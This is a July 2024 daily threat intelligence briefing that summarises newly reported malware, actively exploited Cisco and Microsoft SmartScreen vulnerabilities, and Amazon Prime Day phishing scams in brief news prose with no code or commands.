Cookie Settings

This website uses cookies and similar technologies to provide essential functionality and improve your experience. Some features, such as demo scheduling and chat support, require marketing cookies to function. By clicking "Accept All", you consent to all cookies. Alternatively, you can customize your preferences, but note that declining marketing cookies will limit certain website features.

Cyware Daily Threat Intelligence

Cyware Daily Threat Intelligence - Featured Image

Daily Threat Briefing Jul 8, 2024

In the digital Wild West, a new ransomware outlaw named Eldorado rides into town, guns blazing. This emerging RaaS is making waves by targeting Windows and VMware ESXi virtual machines, with 16 victims already claimed across various sectors in the U.S.

Meanwhile, cybercriminals are exploiting a Microsoft SmartScreen vulnerability in a campaign spanning Spain, the U.S., and Australia. Using deceptive lures related to healthcare insurance, transportation, and taxes, attackers are tricking individuals and organizations into downloading malicious payloads.

As Amazon Prime Day approaches, researchers warn of increased cybercriminal activity targeting online shoppers. A surge in suspicious domains impersonating Amazon has been observed, with criminals employing phishing emails, fake domains, and deceptive files to steal sensitive information.

Top Malware Reported in the Last 24 Hours

Dropbox drops Orcinius trojan

The newly identified multi-stage trojan Orcinius has been found exploiting popular cloud services like Dropbox and Google Docs, making it a formidable threat. The trojan starts with an innocuous Excel spreadsheet containing a modified VBA macro, enabling it to capture keystrokes and active windows once executed. Orcinius downloads secondary payloads from cloud services to evade detection.

New variant of WordFence evasion malware

A new variation of WordFence evasion malware has been discovered that disables the popular WordPress security plugin, creates a malicious admin user, and uses obfuscation and a false WordFence overlay to conceal its presence and activities. The malicious plugin found in this case was named "wp-engine-fast-action", despite the website not being hosted on WPEngine. The malware renames the WordFence plugin directory to "wordfence1", effectively disabling the security plugin. It also includes JavaScript and CSS files that create a false impression that the WordFence security scans are enabled and functioning normally.

Threat landscape sees new RaaS

A new RaaS called Eldorado has emerged, targeting Windows and VMware ESXi virtual machines with its ability to encrypt files using the ChaCha20 algorithm and delete shadow volume copies to prevent recovery. The ransomware has already claimed 16 victims, primarily in the U.S., across various sectors. Eldorado uses advanced encryption methods, targets network shares, and deletes shadow volume copies to maximize impact, but also allows affiliates to customize their attacks.

Top Vulnerabilities Reported in the Last 24 Hours

CISA adds Cisco NX-OS bug to KEV Catalog

The CISA added a Cisco NX-OS command injection vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog. This flaw, tracked as CVE-2024-20399, is under active exploitation by a China-linked group called Velvet Ant. The vulnerability allows attackers to execute arbitrary commands as root on affected devices. Cisco has released patches for the affected devices and recommends monitoring administrative user credentials. Federal agencies have been ordered to fix this vulnerability by July 23, in line with a directive to address known exploited vulnerabilities.

Active campaign abuses Microsoft SmartScreen bug

Cyble spotted an active cyber campaign exploiting the Microsoft SmartScreen vulnerability (CVE-2024-21412), targeting Spain, the U.S., and Australia. The attackers use healthcare insurance, transportation, and tax-related lures to trick individuals and organizations into downloading malicious payloads. The infection starts with a spam email leading to a WebDAV share, ultimately deploying final payloads such as Lumma and Meduza Stealer. The campaign involves multi-stage attacks, DLL sideloading, and IDATLoader to inject the final payload into explorer.exe.

Top Scams Reported in the Last 24 Hours

Fake domains ahead of Amazon Prime Day

Check Point noted an increase in cybercriminal activity targeting online shoppers in anticipation of Amazon Prime Day on July 16-17. Researchers have observed a surge in suspicious domains impersonating Amazon, aiming to steal sensitive information such as login credentials and payment details. The tactics used include phishing emails, fake domains, and deceptive files. Online shoppers should exercise caution during Amazon Prime Day, checking URLs, creating strong passwords, and being wary of phishing emails to ensure safe and secure shopping.

Related Threat Briefings